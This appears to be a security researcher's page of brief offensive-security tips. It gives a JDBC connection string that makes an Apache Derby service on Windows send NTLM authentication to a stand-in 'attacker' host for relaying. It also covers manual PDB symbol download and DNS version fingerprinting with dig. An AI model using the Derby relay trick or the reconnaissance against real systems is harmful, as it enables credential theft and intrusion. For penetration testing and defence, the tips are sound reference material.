| Blog | https://blog.kanbach.org |
| Birdland | https://twitter.com/_bka_ |
| Bluesky | bka-sec.bsky.social |
If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for NTLM relaying.
Example connection string:
jdbc:derby://<target>:1527/\\attacker\foobar;create=false
Downloading symbols for .exe files is easy with tools like symchk, Windbg, IDA or Ghidra. But how to do it manually, for example on Linux with only few tools available?
First we need the UUID of the PDB and its age. We could use objdump for this (screenshot).
The info we are getting from running this command (if .exe was compiled with symbols) is all we need to construct the URL: Name of the PDB (in this example ipconfig.pdb), UUID and age:
Please note that the last digit, 2, behind the UUID corresponds to the age value. That's it, the symbols are going to be downloaded.
Some nameserver implementations could be fingerprinted by querying the server for RR TXT, Class CH (CHAOS) and name "version.bind". Could be done easily using dig:
dig @<nameserver> -t txt -c CH version.bind
